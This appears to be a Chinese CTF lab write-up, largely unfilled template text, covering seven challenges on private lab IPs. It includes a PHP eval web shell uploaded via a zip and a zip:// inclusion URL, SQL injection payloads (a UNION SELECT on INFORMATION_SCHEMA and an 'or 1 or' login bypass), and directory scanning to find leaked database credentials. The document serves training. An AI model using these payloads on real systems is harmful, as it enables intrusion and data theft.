安全杂项
1.包罗万象包罗万象
题目内容:
有一天,小吉发现在网上寻找好用的网盘,这时候他发现了这么一个网站。
题目分析:
对题目进行深入的分析,包括理解题目的要求、查找相关的资料、分析题目所涉及的技术或概念等。
解题过程:创建一个txt文件,写入<?php @eval($_POST['a']);?>,打包压缩成zip文件,上传得到其在服务器内的保存地址,然后粘贴到url=的后面写作http://192.168.210.79/index.php?url=zip:///var/www/html/upload/10569a05941f378d2dcf16da94101ec2.zip%23everything,然后enter,之后将链接粘贴进菜刀就可以跑出
结果展示:
总结与反思:
对整个解题过程进行总结,分享解题的经验教训,以及可能的改进方向。
2.题目描述:
白云新闻搜索
题目分析:
中国又出现了一个搜索巨头!据报道,中国网络大亨小明近日编写了一个搜索引擎,叫白云新闻搜索,具体链接在下方,该搜索链接功能欠打,界面乏力,小明出一包辣条悬赏漏洞,豪言入侵高手都去试试,你服不服?不服就去试试呗~(答案为flag{}形式,提交{}中内容即可)
IP信息:192.168.210.71
解题过程:
详细描述解题的步骤、方法和过程截图,包括使用的工具、技术、遇到的挑战以及如何解决这些挑战等。
首先关js,刷新后可以绕过字符验证,之后用sql语句慢慢试探,先查找sql默认文件,比如:
1、TABLE_SCHEMA:数据库实例名称;
2、TABLE_NAME:数据存放对象表名称;
3、TABLE_TYPE:数据存放对象类型(表或视图);
4、TABLE_ROWS:数据量;
5、COLUMN_NAME:字段名称
6、COLUMN_COMMENT:字段注释
7、COLUMN_TYPE:字段类型
' union select 1,TABLE_SCHEMA,TABLE_NAME from INFORMATION_SCHEMA--'
结果展示:
展示解题的最终结果,包括得到的flag(标志)、分数或其他形式的验证。
总结与反思:
对整个解题过程进行总结,分享解题的经验教训,以及可能的改进方向。
题目描述:
admin123456
题目分析:
入门级入侵,你以为就这样你就能得分了?太小看admin 了。(答案为flag{}形式,提交{}中内容即可)IP信息:192.168.210.74
解题过程:
详细描述解题的步骤、方法和过程截图,包括使用的工具、技术、遇到的挑战以及如何解决这些挑战等。
先关jsp,然后两个’or 1 or’,enter就完了
结果展示:
展示解题的最终结果,包括得到的flag(标志)、分数或其他形式的验证。
总结与反思:
对整个解题过程进行总结,分享解题的经验教训,以及可能的改进方向。
题目描述:
我的生日
题目分析:
没耳朵的的猫,大家都喜欢,因为小口袋有好多东西。但是你知道他的生日么?(答案为flag{}形式,提交{}中内容即可)
IP信息:192.168.210.76
解题过程:
详细描述解题的步骤、方法和过程截图,包括使用的工具、技术、遇到的挑战以及如何解决这些挑战等。
去网上搜哆啦A梦的生日,输入生日和验证码就完了
结果展示:
展示解题的最终结果,包括得到的flag(标志)、分数或其他形式的验证。
总结与反思:
对整个解题过程进行总结,分享解题的经验教训,以及可能的改进方向。
题目描述:
似乎有秘密
题目分析:
这个word文件的内容看起来似乎有啥秘密,解开看看吧
http://192.168.210.21/adl-oss/resources/ab19328c13074a1c80a87ec39bbdd389?token=400cc9e0-4adb-4ee9-97f3-eff540e20274&fileName&fileType=download
解题过程:
详细描述解题的步骤、方法和过程截图,包括使用的工具、技术、遇到的挑战以及如何解决这些挑战等。
该换颜色,然后base64解密就完了
结果展示:
展示解题的最终结果,包括得到的flag(标志)、分数或其他形式的验证。
总结与反思:
对整个解题过程进行总结,分享解题的经验教训,以及可能的改进方向。
题目描述:
管理员的愤怒
题目分析:
阿水是某部门的网站管理员,一天他发现自己管理的网站被挂上了暗链,链接指向了一个IP。阿水非常愤怒,表示一定要给点对方颜色看看,但是这小子没学过渗透。下面给各位这个IP,看大家如何进入坏蛋的网站获得flag为阿水报仇。
IP信息:192.168.210.78
解题过程:
详细描述解题的步骤、方法和过程截图,包括使用的工具、技术、遇到的挑战以及如何解决这些挑战等。
复制IP御剑扫描,扫出四个网址
打开看看有什么
在db.phps文件中有数据库密码,下载打开,查看
在打开网页http://192.168.210.78/dbadmin登录,找到flag
结果展示:
展示解题的最终结果,包括得到的flag(标志)、分数或其他形式的验证。
总结与反思:
对整个解题过程进行总结,分享解题的经验教训,以及可能的改进方向。
题目描述:
隐藏的钥匙
题目分析:
路飞一行人千辛万苦来到了伟大航道的终点,找到了传说中的One piece,但是需要钥匙才能打开One Piece大门,钥匙就隐藏在下面的图片中,聪明的你能帮路飞拿到钥匙,打开One
解题过程:
详细描述解题的步骤、方法和过程截图,包括使用的工具、技术、遇到的挑战以及如何解决这些挑战等。
将图片用hxd打开,查找字符flag,
将字符用base64解析
结果展示:
展示解题的最终结果,包括得到的flag(标志)、分数或其他形式的验证。
总结与反思:
对整个解题过程进行总结,分享解题的经验教训,以及可能的改进方向。
2020
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
